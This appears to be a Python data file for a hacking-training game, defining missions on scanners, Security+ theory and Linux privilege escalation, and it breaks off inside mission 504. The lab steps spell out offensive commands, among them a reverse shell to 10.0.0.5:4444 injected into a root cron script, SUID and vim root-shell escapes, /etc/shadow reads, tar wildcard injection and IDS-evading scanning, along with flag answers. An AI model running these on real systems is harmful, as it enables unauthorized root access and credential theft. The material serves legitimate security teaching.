"""
CyberSim Mission Data — Phase 1 Month 3 (Python) + Phase 2 (Security+, PrivEsc, Crypto, Web)
Missions 301-706
"""
from core.mission_types import TYPE_LAB, TYPE_THEORY, TYPE_PROJECT

def _m(mid, name, mtype, phase, easy, normal, hard, **kw):
    """Compact mission builder."""
    d = {"id": mid, "name": name, "type": mtype, "phase": phase, "easy": easy, "normal": normal, "hard": hard}
    d.update(kw)
    return d

def _lab(briefing, objective, methods, tools, guide, sec, flag, xp, **kw):
    d = {"briefing": briefing, "objective": objective, "methods": methods,
         "tools": [{"name": t[0], "cmd": t[1], "desc": t[2]} for t in tools],
         "step_by_step_guide": guide, "security_level": sec, "flag": flag, "xp_reward": xp}
    d.update(kw)
    return d

def _theory(briefing, objective, topics, guide, quiz, xp):
    return {"briefing": briefing, "objective": objective, "study_topics": topics,
            "study_guide": guide, "quiz": [{"q": q, "a": a} for q, a in quiz], "xp_reward": xp}

DC30 = {"block_duration": 30, "active_signatures": []}
DC45 = {"block_duration": 45, "active_signatures": []}
DC120 = {"block_duration": 120, "kill_sessions": True, "patch_vulns": True}

MISSIONS_P2 = {
# ═══ MONTH 3: PYTHON (Days 61-90) ═══
301: _m(301, "Python Fundamentals", TYPE_THEORY, 1,
    _theory("Master Python basics — the hacker's scripting language of choice.",
        "Learn data types, functions, error handling, and file I/O.",
        ["Variables & data types: str, int, list, dict, tuple, set",
         "Control flow: if/elif/else, for loops, while loops",
         "Functions: def, return, *args, **kwargs",
         "Error handling: try/except/finally",
         "File I/O: open(), read(), write(), with statement"],
        "1. Install Python3: python3 --version\n2. Create hello.py: print('Hello Hacker')\n3. Practice lists: ports = [22,80,443]; for p in ports: print(p)\n4. Practice dicts: services = {22:'ssh', 80:'http'}\n5. Write a function: def scan(ip, port): ...\n6. Handle errors: try: connect() except: print('Failed')",
        [("Python keyword to define a function?", "def"), ("How to handle exceptions?", "try except"), ("List method to add item?", "append")], 50),
    _theory("Intermediate Python — OOP, modules, and network libraries.",
        "Build classes, use pip packages, understand sockets.",
        ["Classes: class Scanner: def __init__(self, target): ...",
         "Modules: import socket, import os, import sys",
         "pip: pip install requests, pip install scapy",
         "List comprehensions: [p for p in range(1,1001) if is_open(p)]"],
        "1. Create a Scanner class with scan() method.\n2. Use socket: s=socket.socket(); s.connect((ip,port))\n3. Install requests: pip install requests\n4. Make HTTP request: r=requests.get(url); print(r.status_code)",
        [("Python package manager?", "pip"), ("Module for network connections?", "socket")], 75),
    _theory("Advanced Python — async, threading, and exploit development.",
        "Write concurrent scanners and understand Python internals.",
        ["Threading: from threading import Thread",
         "Asyncio: async def scan(): await ...",
         "Subprocess: subprocess.run(['nmap', '-sV', target])",
         "Struct: pack/unpack binary data for exploit dev"],
        "1. Write threaded scanner: Thread(target=scan, args=(port,)).start()\n2. Use asyncio for 1000+ concurrent connections.\n3. Use struct.pack for buffer overflow payloads.\n4. Build a complete exploitation framework in Python.",
        [("Module for running system commands?", "subprocess"), ("Module for binary packing?", "struct")], 100)),

302: _m(302, "TCP Connect Port Scanner", TYPE_PROJECT, 1,
    _lab("Write a Python port scanner using the socket library to scan ports 1-1000 on a target.",
        "Create a working port scanner script from scratch.",
        ["socket.connect() for TCP connect", "Timeout handling with settimeout()", "Result formatting"],
        [("socket", "import socket; s=socket.socket()", "Core networking module"),
         ("connect", "s.connect((ip, port))", "TCP connect to port"),
         ("settimeout", "s.settimeout(1)", "1 second timeout per port")],
        "STEP 1: import socket\nSTEP 2: Create function: def scan_port(ip, port):\nSTEP 3: Inside: s=socket.socket(); s.settimeout(1)\nSTEP 4: try: s.connect((ip,port)); return True; except: return False\nSTEP 5: Loop ports 1-1000: for p in range(1,1001): if scan_port(target,p): print(f'{p} OPEN')\nSTEP 6: Run: python3 scanner.py <TARGET_IP>",
        "None — Local project.", "FLAG{tcp_sc4nn3r_wr1tt3n}", 75),
    _lab("Improve scanner with banner grabbing and service identification.",
        "Add banner grabbing to identify what runs on each open port.",
        ["Banner grabbing via recv()", "Service fingerprinting", "Output to file"],
        [("recv", "data = s.recv(1024).decode()", "Receive banner"),
         ("sendall", "s.sendall(b'HEAD / HTTP/1.0\\r\\n\\r\\n')", "Send HTTP probe")],
        "STEP 1: After connect succeeds, try: banner = s.recv(1024)\nSTEP 2: Decode and print: print(f'{port}: {banner.decode().strip()}')\nSTEP 3: For HTTP: send HEAD request, parse response.\nSTEP 4: Save results to scan_results.txt",
        "Target has rate limiting.", "FLAG{b4nn3r_gr4b_pr0}", 125,
        defender_config=DC30),
    _lab("Write a scanner that evades IDS by randomizing port order and adding jitter.",
        "Create an evasive scanner with randomized scanning and timing control.",
        ["Random port order with random.shuffle()", "Random delay between scans", "IP spoofing with Scapy"],
        [("random", "import random; ports=list(range(1,1001)); random.shuffle(ports)", "Randomize order"),
         ("time.sleep", "time.sleep(random.uniform(0.1, 0.5))", "Random jitter"),
         ("scapy", "from scapy.all import sr1, IP, TCP", "Craft custom packets")],
        "STEP 1: Randomize port order to avoid sequential detection.\nSTEP 2: Add random delays: time.sleep(random.uniform(0.1,2))\nSTEP 3: Use raw sockets or Scapy for SYN-only scanning.\nSTEP 4: Implement retry logic for blocked connections.\nSTEP 5: Output results and submit flag.",
        "Active IDS — sequential scans blocked, IP blocked after 50 rapid connections.",
        "FLAG{3v4s1v3_sc4nn3r_3l1t3}", 200, defender_config=DC120)),

303: _m(303, "Threaded Port Scanner", TYPE_PROJECT, 1,
    _lab("Make your scanner blazing fast using Python threading.",
        "Scan all 65535 ports in under 60 seconds using threads.",
        ["threading.Thread for concurrent scanning", "Queue for thread-safe port distribution", "ThreadPoolExecutor"],
        [("ThreadPool", "from concurrent.futures import ThreadPoolExecutor", "Managed thread pool"),
         ("Queue", "from queue import Queue", "Thread-safe queue"),
         ("threading", "from threading import Thread, Lock", "Basic threading")],
        "STEP 1: from concurrent.futures import ThreadPoolExecutor\nSTEP 2: def scan(port): try: s=socket.socket(); s.settimeout(1); s.connect((target,port)); return port; except: return None\nSTEP 3: with ThreadPoolExecutor(max_workers=100) as ex:\nSTEP 4:   results = ex.map(scan, range(1,65536))\nSTEP 5: Print open ports. Run and time it!",
        "None — Local development.", "FLAG{thr34d3d_sp33d}", 100),
    _lab("Add thread-safe output, progress bar, and graceful shutdown.",
        "Professional-grade scanner with clean output and signal handling.",
        ["Lock for thread-safe printing", "tqdm for progress bars", "signal handling for CTRL+C"],
        [("Lock", "lock = Lock(); with lock: print(result)", "Thread-safe print"),
         ("tqdm", "from tqdm import tqdm; for p in tqdm(ports):", "Progress bar"),
         ("signal", "signal.signal(signal.SIGINT, handler)", "Handle CTRL+C")],
        "STEP 1: Add Lock() for thread-safe output.\nSTEP 2: pip install tqdm; wrap loop with tqdm.\nSTEP 3: Add signal handler for graceful CTRL+C.\nSTEP 4: Add --output flag to save to file.\nSTEP 5: Submit flag.",
        "None", "FLAG{pr0_sc4nn3r_cl34n}", 150),
    _lab("Implement async scanning with asyncio for 100K+ connections per second.",
        "Build an enterprise-grade async scanner rivaling masscan.",
        ["asyncio for non-blocking I/O", "Semaphore for concurrency control", "Custom protocol handlers"],
        [("asyncio", "import asyncio; async def scan(ip,port):", "Async framework"),
         ("Semaphore", "sem = asyncio.Semaphore(500)", "Limit concurrent tasks"),
         ("gather", "await asyncio.gather(*tasks)", "Run all tasks concurrently")],
        "STEP 1: async def scan_port(sem, ip, port):\nSTEP 2:   async with sem: ...\nSTEP 3: tasks = [scan_port(sem,ip,p) for p in range(1,65536)]\nSTEP 4: asyncio.run(main())\nSTEP 5: Compare speed with threaded version. Submit flag.",
        "Rate limiting active.", "FLAG{4sync_sc4nn3r_3l1t3}", 200, defender_config=DC120)),

304: _m(304, "HTTP & Web Requests in Python", TYPE_THEORY, 1,
    _theory("Learn HTTP requests in Python — the foundation of web hacking tools.",
        "Master the requests library and understand HTTP methods.",
        ["GET vs POST vs PUT vs DELETE", "Headers, cookies, sessions", "requests.get(), requests.post()", "Response parsing: .status_code, .text, .json()"],
        "1. pip install requests\n2. r = requests.get('http://example.com'); print(r.status_code)\n3. POST: requests.post(url, data={'user':'admin','pass':'123'})\n4. Headers: requests.get(url, headers={'User-Agent':'Mozilla/5.0'})\n5. Sessions: s=requests.Session(); s.post(login_url, data=creds); s.get(protected_url)",
        [("Library for HTTP in Python?", "requests"), ("HTTP method to submit form?", "post")], 50),
    _theory("Advanced HTTP — proxies, SSL, and authentication.",
        "Use proxies, handle SSL errors, and implement OAuth/API auth.",
        ["Proxy support: proxies={'http':'http://127.0.0.1:8080'}", "SSL verify: verify=False", "API authentication: Bearer tokens, API keys", "Rate limiting and retry logic"],
        "1. Route through Burp: proxies={'http':'http://127.0.0.1:8080'}\n2. Ignore SSL errors: requests.get(url, verify=False)\n3. API auth: headers={'Authorization': 'Bearer <token>'}\n4. Implement exponential backoff for rate limits.",
        [("How to route requests through Burp proxy?", "proxies parameter"), ("Disable SSL verification?", "verify=False")], 75),
    _theory("Expert HTTP — raw sockets, HTTP smuggling, websockets.",
        "Build HTTP clients from scratch and understand protocol edge cases.",
        ["Raw HTTP with socket: send('GET / HTTP/1.1\\r\\nHost: target\\r\\n\\r\\n')", "HTTP/2 and HTTP/3 differences", "WebSocket connections with websocket-client", "HTTP Request Smuggling concepts"],
        "1. Build raw HTTP client with socket library.\n2. Understand Transfer-Encoding vs Content-Length conflicts.\n3. Connect to WebSocket: ws = websocket.create_connection(url)\n4. Study HTTP Smuggling: CL.TE and TE.CL attacks.",
        [("Raw HTTP ends with?", "\\r\\n\\r\\n"), ("HTTP Smuggling exploits conflict between?", "content-length and transfer-encoding")], 100)),

305: _m(305, "Custom Directory Bruteforcer", TYPE_PROJECT, 1,
    _lab("Write a dirbusting tool in Python that discovers hidden directories on a web server.",
        "Build a tool like dirb/gobuster in Python using a wordlist.",
        ["requests.get() with wordlist", "Status code filtering", "Threading for speed"],
        [("requests", "r = requests.get(f'http://{ip}/{word}')", "Test each path"),
         ("wordlist", "with open('wordlist.txt') as f: words = f.read().splitlines()", "Load wordlist"),
         ("status", "if r.status_code != 404: print(f'FOUND: /{word}')", "Filter results")],
        "STEP 1: Load wordlist: words = open('wordlist.txt').read().splitlines()\nSTEP 2: For each word: r = requests.get(f'http://{target}/{word}')\nSTEP 3: If status != 404: print as found.\nSTEP 4: Add User-Agent header to avoid WAF.\nSTEP 5: Run against target and submit flag.",
        "None", "FLAG{d1rbust3r_wr1tt3n}", 100),
    _lab("Add recursive scanning, file extension testing, and output formatting.",
        "Professional dirbuster with recursion and multiple extensions.",
        ["Recursive directory scanning", "Extension fuzzing (.php,.html,.txt,.bak)", "JSON/HTML report output"],
        [("recursive", "def scan_dir(base_url, depth):", "Recursive function"),
         ("extensions", "exts = ['', '.php', '.html', '.txt', '.bak']", "Test extensions")],
        "STEP 1: Add extension testing: try /path, /path.php, /path.bak\nSTEP 2: When directory found, recurse into it.\nSTEP 3: Add depth limit to prevent infinite recursion.\nSTEP 4: Output results as JSON report.\nSTEP 5: Submit flag.",
        "Rate limiting on rapid requests.", "FLAG{r3curs1v3_d1rb}", 150, defender_config=DC45),
    _lab("Build an IDS-evading dirbuster with randomized timing, header rotation, and proxy chains.",
        "Evade WAF and rate limiting while discovering directories.",
        ["User-Agent rotation", "Random delays", "Proxy rotation", "Custom 404 detection"],
        [("UA rotation", "ua = random.choice(user_agents)", "Randomize User-Agent"),
         ("proxy", "proxies={'http': random.choice(proxy_list)}", "Rotate proxies")],
        "STEP 1: Rotate User-Agents from a list.\nSTEP 2: Add jitter: time.sleep(random.uniform(1,3))\nSTEP 3: Detect custom 404 pages (same content but 200 status).\nSTEP 4: Route through proxy list.\nSTEP 5: Submit flag.",
        "Active WAF — blocks repeated requests from same UA/IP.",
        "FLAG{w4f_3v4s10n_d1rb}", 200, defender_config=DC120)),

306: _m(306, "Regular Expressions for Hackers", TYPE_THEORY, 1,
    _theory("Master regex — the Swiss Army knife for parsing hacker tool output.",
        "Learn regex patterns for extracting IPs, emails, hashes, and URLs from text.",
        ["Basic patterns: ., *, +, ?, [], ^, $", "Groups: (pattern), named groups (?P<name>)",
         "Common patterns: IP address, email, URL, hash", "Python re module: re.findall(), re.search(), re.sub()"],
        "1. import re\n2. Find IPs: re.findall(r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', text)\n3. Find emails: re.findall(r'[\\w.]+@[\\w.]+', text)\n4. Find MD5 hashes: re.findall(r'\\b[a-f0-9]{32}\\b', text)\n5. Practice: Parse nmap output to extract open ports.",
        [("Python regex module?", "re"), ("Regex for any digit?", "\\d")], 50),
    _theory("Advanced regex — lookaheads, backreferences, and performance.",
        "Write complex patterns for log analysis and data extraction.",
        ["Lookahead: (?=pattern), Lookbehind: (?<=pattern)", "Backreferences: \\1, \\2",
         "Non-greedy matching: *?, +?", "Regex for parsing Apache/Nginx logs"],
        "1. Parse Apache log: r'(\\S+) .* \\[(.+?)\\] \"(\\S+) (\\S+)\"'\n2. Use named groups: (?P<ip>\\S+)\n3. Non-greedy: Use .*? instead of .*\n4. Build a log analyzer with regex.",
        [("Non-greedy quantifier for *?", "*?"), ("Named group syntax?", "(?P<name>)")], 75),
    _theory("Expert regex — automata theory and ReDoS prevention.",
        "Understand regex engines and write safe, efficient patterns.",
        ["NFA vs DFA engines", "ReDoS: catastrophic backtracking", "Atomic groups and possessive quantifiers", "Regex in security tools: Snort/Suricata rules"],
        "1. Understand why (a+)+ is dangerous (exponential backtracking).\n2. Always use anchors (^, $) and be specific.\n3. Study how Snort uses regex for IDS signatures.\n4. Write a custom Snort rule using regex.",
        [("What is ReDoS?", "regular expression denial of service"), ("Regex engine that backtracks?", "nfa")], 100)),

307: _m(307, "Apache Log Parser", TYPE_PROJECT, 1,
    _lab("Write a Python script that parses Apache access logs and finds the top 5 IPs attempting SQL injection.",
        "Build a log analysis tool to identify attacks from web server logs.",
        ["File reading and line parsing", "Regex for SQLi pattern matching", "Counter/defaultdict for statistics"],
        [("Counter", "from collections import Counter", "Count occurrences"),
         ("regex", "re.search(r\"('|union|select|or 1=1)\", line, re.I)", "SQLi patterns"),
         ("open", "with open('access.log') as f: lines = f.readlines()", "Read log file")],
        "STEP 1: Read the log file: with open('access.log') as f:\nSTEP 2: For each line, check for SQLi patterns: ' OR, UNION SELECT, etc.\nSTEP 3: Extract source IP from matching lines.\nSTEP 4: Count IPs: Counter(ips).most_common(5)\nSTEP 5: Print report and submit flag.",
        "None", "FLAG{l0g_p4rs3r_sql1}", 100),
    _lab("Parse multiple log formats (Apache, Nginx, JSON), detect multiple attack types.",
        "Multi-format parser detecting SQLi, XSS, LFI, and command injection.",
        ["Multiple log format parsers", "Attack type classification", "Severity scoring"],
        [("json", "import json; log = json.loads(line)", "Parse JSON logs"),
         ("classify", "def classify_attack(request):", "Categorize attack type")],
        "STEP 1: Detect log format (Apache combined, Nginx, JSON).\nSTEP 2: Parse accordingly.\nSTEP 3: Classify: SQLi, XSS (<script>), LFI (../), CMDi (;|&).\nSTEP 4: Score severity and generate report.\nSTEP 5: Submit flag.",
        "None", "FLAG{mult1_f0rm4t_p4rs3r}", 150),
    _lab("Real-time log streaming, ML-based anomaly detection, and automated blocking.",
        "Build a real-time SIEM-lite that monitors logs and auto-blocks attackers.",
        ["Tail -f equivalent in Python", "Statistical anomaly detection", "Subprocess for iptables blocking"],
        [("tail", "import subprocess; p=subprocess.Popen(['tail','-f','access.log'],...)", "Stream logs"),
         ("anomaly", "if req_count > threshold: alert()", "Detect anomalies")],
        "STEP 1: Implement real-time log tailing.\nSTEP 2: Maintain sliding window of request counts per IP.\nSTEP 3: If IP exceeds threshold, auto-block with iptables.\nSTEP 4: Generate alert with attack details.\nSTEP 5: Submit flag.",
        "None", "FLAG{r34lt1m3_s13m_3l1t3}", 200)),

# ═══ PHASE 2: MONTH 4 — SECURITY+ THEORY (Days 91-120) ═══
401: _m(401, "IAM & Access Control", TYPE_THEORY, 2,
    _theory("Master Identity and Access Management — who gets access to what.",
        "Learn authentication methods, MFA, RBAC, and access control models.",
        ["Authentication factors: Something you know/have/are", "MFA: 2FA, TOTP, FIDO2/WebAuthn",
         "Access models: DAC, MAC, RBAC, ABAC", "SSO: SAML, OAuth2, OpenID Connect", "Least Privilege Principle"],
        "1. Compare DAC vs MAC vs RBAC.\n2. Set up 2FA with Google Authenticator.\n3. Understand OAuth2 flow: Authorization Code Grant.\n4. Study: How can MFA be bypassed? (SIM swap, phishing, fatigue attacks)",
        [("Three authentication factors?", "know have are"), ("Most common MFA bypass?", "phishing")], 50),
    _theory("Advanced IAM — attacking authentication systems.",
        "Learn how to identify and exploit authentication vulnerabilities.",
        ["Password spraying vs credential stuffing", "JWT token vulnerabilities (none algorithm, weak secret)",
         "OAuth misconfigurations", "Kerberos attacks: AS-REP roasting, Kerberoasting"],
        "1. Study JWT: header.payload.signature (base64 encoded).\n2. Attack: Change alg to 'none' and remove signature.\n3. Crack JWT secret: hashcat -m 16500 jwt.txt wordlist.txt\n4. Research Kerberoasting: Request service tickets, crack offline.",
        [("JWT consists of how many parts?", "3"), ("Tool to crack JWT secrets?", "hashcat")], 75),
    _theory("Expert IAM — building and breaking enterprise auth.",
        "Design secure auth systems and identify zero-day auth bypasses.",
        ["Active Directory: Domain Controllers, GPOs, Trusts", "Zero Trust Architecture",
         "Certificate-based auth and PKI attacks", "FIDO2 security model and limitations"],
        "1. Set up a test AD lab with Windows Server.\n2. Study Golden Ticket and Silver Ticket attacks.\n3. Implement Zero Trust: Never trust, always verify.\n4. Research recent auth bypass CVEs (e.g., ProxyLogon, PrintNightmare).",
        [("AD attack giving unlimited access?", "golden ticket"), ("Zero Trust principle?", "never trust always verify")], 100)),

402: _m(402, "Risk Management & Threat Modeling", TYPE_THEORY, 2,
    _theory("Understand risk—the foundation of all security decisions.",
        "Learn STRIDE, risk calculations (ALE/SLE/ARO), and frameworks.",
        ["Risk = Threat × Vulnerability × Impact", "ALE = SLE × ARO formula",
         "STRIDE: Spoofing, Tampering, Repudiation, Info Disclosure, DoS, Elevation",
         "Frameworks: NIST CSF, ISO 27001, CIS Controls"],
        "1. Calculate: Asset=$100K, SLE=50%, ARO=2/year → ALE=$100K\n2. Apply STRIDE to a web app: What threats exist?\n3. Compare NIST CSF vs ISO 27001.\n4. Create a risk register for a sample organization.",
        [("ALE formula?", "sle x aro"), ("STRIDE S stands for?", "spoofing")], 50),
    _theory("Applied threat modeling for penetration testers.",
        "Use threat modeling to prioritize attack vectors during engagements.",
        ["Attack trees for modeling exploits", "MITRE ATT&CK framework",
         "Threat intelligence feeds", "Risk-based vulnerability prioritization (CVSS vs EPSS)"],
        "1. Build an attack tree for compromising a web server.\n2. Map your attack to MITRE ATT&CK techniques.\n3. Research CVSS vs EPSS — which better predicts exploitation?\n4. Create a threat model for a cloud-hosted SaaS application.",
        [("MITRE framework for adversary techniques?", "att&ck"), ("Vulnerability severity scoring?", "cvss")], 75),
    _theory("Expert risk — quantitative analysis and board-level security strategy.",
        "Perform quantitative risk analysis and develop security strategies.",
        ["Monte Carlo simulation for risk quantification", "Cyber insurance considerations",
         "Regulatory compliance: GDPR, HIPAA, PCI-DSS, SOC2"],
        "1. Build a Monte Carlo risk model in Python.\n2. Compare qualitative vs quantitative risk assessment.\n3. Map PCI-DSS requirements to technical controls.\n4. Write a security strategy brief for C-suite.",
        [("Regulation for payment card data?", "pci-dss"), ("EU privacy regulation?", "gdpr")], 100)),

403: _m(403, "Malware & Social Engineering", TYPE_THEORY, 2,
    _theory("Know your enemy — understand malware types and social engineering vectors.",
        "Learn ransomware, trojans, rootkits, and phishing techniques.",
        ["Malware types: Virus, Worm, Trojan, Ransomware, Rootkit, Spyware, Adware",
         "Ransomware: Encryption, double extortion, RaaS",
         "Social Engineering: Phishing, spear phishing, vishing, pretexting, baiting",
         "Logic Bombs and backdoors"],
        "1. Study WannaCry: How did it spread? (EternalBlue/MS17-010)\n2. Analyze a phishing email: Check headers, hover over links.\n3. Understand ransomware kill chain: Initial access → lateral movement → encryption.\n4. Research social engineering: Kevin Mitnick's techniques.",
        [("Malware that encrypts files for ransom?", "ransomware"), ("Targeted phishing?", "spear phishing")], 50),
    _theory("Malware analysis basics — static and dynamic analysis.",
        "Learn to analyze malware samples safely.",
        ["Static analysis: strings, file, PEview, Ghidra", "Dynamic analysis: Sandbox, Process Monitor, Wireshark",
         "Indicators of Compromise (IOCs)", "YARA rules for malware detection"],
        "1. Set up a malware analysis VM (FlareVM or REMnux).\n2. Static: Run strings on a sample, look for IPs/URLs.\n3. Dynamic: Execute in sandbox, monitor network with Wireshark.\n4. Write a YARA rule to detect the sample.",
        [("Tool for reverse engineering binaries?", "ghidra"), ("Malware detection rules language?", "yara")], 75),
    _theory("Advanced malware — evasion, persistence, and APT techniques.",
        "Understand how advanced threats evade detection.",
        ["Living off the Land (LOLBins)", "Fileless malware: PowerShell, WMI",
         "Process injection: DLL injection, process hollowing",
         "C2 frameworks: Cobalt Strike, Sliver, Havoc"],
        "1. Research LOLBins: certutil, mshta, regsvr32.\n2. Understand fileless: PowerShell download cradle.\n3. Study Cobalt Strike beacon behavior.\n4. Analyze APT group TTPs on MITRE ATT&CK.",
        [("Legitimate tools abused by attackers?", "lolbins"), ("Popular red team C2 framework?", "cobalt strike")], 100)),

# ═══ PHASE 2: MONTH 5 — PRIVILEGE ESCALATION (Days 121-150) ═══
501: _m(501, "The SUID Hunt", TYPE_LAB, 2,
    docker_image="linux_gym", container="cybersim_linux_gym",
    easy=_lab("Find a binary with the SUID bit set, owned by root, that allows file reads. Submit its absolute path.",
        "Discover SUID binaries and exploit them for privilege escalation.",
        ["find with -perm -4000", "Understanding SUID/SGID", "GTFOBins for exploitation"],
        [("find SUID", "find / -perm -4000 -user root 2>/dev/null", "Find all SUID binaries"),
         ("ls -la", "ls -la /usr/bin/python3", "Check binary permissions"),
         ("GTFOBins", "https://gtfobins.github.io", "SUID exploitation reference")],
        "STEP 1: Run: find / -perm -4000 -user root 2>/dev/null\nSTEP 2: List all SUID binaries found.\nSTEP 3: Check GTFOBins for each — which allows file read?\nSTEP 4: /usr/bin/python3 with SUID: python3 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'\nSTEP 5: Submit path as flag.",
        "None — Open system.", "FLAG{su1d_hunt_34sy}", 75),
    normal=_lab("Multiple SUID binaries exist but most are red herrings. Find the real exploitable one.",
        "Filter decoy SUID binaries and find the genuinely exploitable one.",
        ["Cross-reference with GTFOBins", "Check actual binary capabilities", "Analyze binary with strings"],
        [("GTFOBins check", "searchsploit <binary_name>", "Check for known exploits"),
         ("capabilities", "getcap -r / 2>/dev/null", "Check Linux capabilities"),
         ("strings", "strings /usr/bin/suspect_binary", "Analyze binary strings")],
        "STEP 1: find / -perm -4000 -type f 2>/dev/null — many results.\nSTEP 2: Check each against GTFOBins.\nSTEP 3: Also check capabilities: getcap -r / 2>/dev/null\nSTEP 4: Test exploit for the real target.\nSTEP 5: Submit flag.",
        "Audit logging on SUID binary execution.", "FLAG{su1d_f1lt3r_pr0}", 125, defender_config=DC30),
    hard=_lab("SUID binaries are patched. Use alternative privesc vectors: capabilities, NFS, kernel exploits.",
        "No easy SUID exploit available. Chain multiple vectors for root.",
        ["Linux Capabilities (CAP_SETUID)", "NFS no_root_squash", "Kernel exploit CVEs", "Custom SUID binary analysis"],
        [("capabilities", "getcap -r / 2>/dev/null", "Find binaries with capabilities"),
         ("NFS", "cat /etc/exports", "Check NFS misconfigs"),
         ("kernel", "uname -r && searchsploit linux kernel", "Check kernel version")],
        "STEP 1: SUID binaries are secured. Check capabilities: getcap -r /\nSTEP 2: Check NFS: showmount -e localhost; cat /etc/exports\nSTEP 3: Check kernel: uname -r; search for exploits.\nSTEP 4: Chain: capability binary → write SUID shell → root.\nSTEP 5: Submit flag.",
        "Active Defender — monitors privilege escalation attempts.",
        "FLAG{ch41n3d_pr1v3sc_3l1t3}", 200, defender_config=DC120)),

502: _m(502, "Cron Jobs Chaos", TYPE_LAB, 2,
    docker_image="linux_gym", container="cybersim_linux_gym",
    easy=_lab("A cron job runs every minute executing a writable script in /tmp. Exploit it for a root reverse shell.",
        "Inject a reverse shell command into the writable cron script.",
        ["cat /etc/crontab to find jobs", "Writable script exploitation", "Reverse shell payloads"],
        [("crontab", "cat /etc/crontab", "View scheduled tasks"),
         ("writable check", "ls -la /tmp/cleanup.sh", "Check if script is writable"),
         ("rev shell", "echo 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1' >> /tmp/cleanup.sh", "Inject payload")],
        "STEP 1: Check cron jobs: cat /etc/crontab; ls /etc/cron.d/\nSTEP 2: Find: * * * * * root /tmp/cleanup.sh\nSTEP 3: Check permissions: ls -la /tmp/cleanup.sh (writable!)\nSTEP 4: Inject: echo 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1' >> /tmp/cleanup.sh\nSTEP 5: Set up listener: nc -lvnp 4444\nSTEP 6: Wait 60 seconds — root shell! Submit flag.",
        "None", "FLAG{cr0n_r3v_sh3ll_34sy}", 75),
    normal=_lab("Cron script is not directly writable, but the directory has weak permissions. Use path manipulation.",
        "Exploit directory permissions or PATH variable to hijack the cron job.",
        ["Directory permission exploitation", "PATH variable hijacking", "Symlink attacks"],
        [("path check", "echo $PATH", "Check cron PATH"),
         ("symlink", "ln -sf /tmp/evil.sh /usr/local/bin/cleanup", "Create symlink"),
         ("dir perms", "ls -la /usr/local/bin/", "Check dir writability")],
        "STEP 1: Cron runs: cleanup (no absolute path).\nSTEP 2: Check PATH order in crontab.\nSTEP 3: Create your cleanup in a directory earlier in PATH.\nSTEP 4: Your script runs instead of the real one.\nSTEP 5: Submit flag.",
        "File integrity checks run periodically.", "FLAG{p4th_h1j4ck_cr0n}", 125, defender_config=DC45),
    hard=_lab("Cron is hardened: absolute paths, restricted permissions. Exploit cron race conditions or wildcards.",
        "Use advanced cron exploitation: tar wildcards, race conditions.",
        ["Tar wildcard injection (tar * in cron)", "Race condition in cron temp files", "pspy for process snooping"],
        [("pspy", "./pspy64", "Monitor processes without root"),
         ("tar wildcard", "echo '' > '--checkpoint=1'; echo '' > '--checkpoint-action=exec=sh shell.sh'", "Tar wildcard exploit"),
         ("race", "while true; do cp evil.sh /tmp/target.sh; done", "Race condition")],
        "STEP 1: Use pspy to monitor processes run by root.\nSTEP 2: Find cron running: tar czf /backup/files.tar.gz *\nSTEP 3: Exploit tar wildcard: create --checkpoint malicious files.\nSTEP 4: Wait for cron to execute tar with your files.\nSTEP 5: Root shell achieved. Submit flag.",
        "Active Defender — monitors file creation in cron directories.",
        "FLAG{t4r_w1ldc4rd_3l1t3}", 200, defender_config=DC120)),

503: _m(503, "Sudo Exploitation", TYPE_LAB, 2,
    docker_image="linux_gym", container="cybersim_linux_gym",
    easy=_lab("User can run /bin/cat as root without password. Read /etc/shadow.",
        "Use sudo cat to read the shadow file.",
        ["sudo -l to list privileges", "Direct exploitation of allowed commands"],
        [("sudo -l", "sudo -l", "List sudo privileges"),
         ("sudo cat", "sudo cat /etc/shadow", "Read shadow file as root")],
        "STEP 1: sudo -l → see: (root) NOPASSWD: /bin/cat\nSTEP 2: sudo cat /etc/shadow\nSTEP 3: Submit the flag found in shadow comments.",
        "None", "FLAG{sud0_c4t_sh4d0w}", 75),
    normal=_lab("Restricted to /usr/bin/vim. Escape to root shell through vim.",
        "Use GTFOBins vim technique to get a root shell.",
        ["GTFOBins sudo techniques", "Shell escape from editors", "Vim command mode"],
        [("vim escape", "sudo vim -c ':!/bin/bash'", "Shell escape from vim"),
         ("vim alt", "sudo vim → :set shell=/bin/bash → :shell", "Alternative escape")],
        "STEP 1: sudo -l → (root) NOPASSWD: /usr/bin/vim\nSTEP 2: sudo vim -c ':!/bin/bash'\nSTEP 3: You now have a root shell!\nSTEP 4: cat /etc/shadow and submit flag.",
        "Command logging active.", "FLAG{v1m_sh3ll_3sc4p3}", 125, defender_config=DC30),
    hard=_lab("Sudo version is vulnerable (CVE-2021-3156 Baron Samedit). Exploit without any allowed commands.",
        "Exploit sudo vulnerability for privilege escalation from zero sudo rights.",
        ["CVE-2021-3156 exploitation", "Sudo version checking", "Heap overflow basics"],
        [("version", "sudo -V", "Check sudo version"),
         ("exploit", "python3 exploit_baron_samedit.py", "Run CVE exploit"),
         ("searchsploit", "searchsploit sudo 1.8", "Find sudo exploits")],
        "STEP 1: sudo -l shows NO allowed commands.\nSTEP 2: Check version: sudo -V → 1.8.31 (VULNERABLE!)\nSTEP 3: Search: searchsploit sudo 1.8 → CVE-2021-3156\nSTEP 4: Download and compile the exploit.\nSTEP 5: Run exploit → root shell! Submit flag.",
        "Active Defender — patches sudo after detection.",
        "FLAG{b4r0n_s4m3d1t_3l1t3}", 200, defender_config=DC120)),

504: _m(504, "Linux Kernel Privileges Theory", TYPE_THEORY, 2,
    _theory("How Linux handles privileges at the kernel level.",
        "Learn Real UID vs Effective UID, capabilities, and namespaces.",
        ["Real UID vs Effective UID vs Saved UID", "setuid() system call",
         "Linux Capabilities: CAP_NET_RAW, CAP_SETUID, etc.", "Namespaces and cgroups for container isolation"],
        "1. Check your IDs: id, cat /proc/self/status | grep Uid\n2. Understand: RUID=1000, EUID=0 means running as root via SUID.\n3. List capabilities: getpcaps $$\n4. Explore namespaces: ls -la /proc/self/ns/",
        [("System call to change user ID?", "setuid"), ("What does EUID=0 mean?", "running as root")], 50),
    _theory("Kernel exploitation theory — how kernel bugs lead to root.",
        "Understand kernel exploit primitives and common bug classes.",
        ["Use-after-free in kernel", "Race conditions (TOCTOU)", "Type confusion",
         "Dirty COW (CVE-2016-5195) explained", "Kernel module exploitation"],
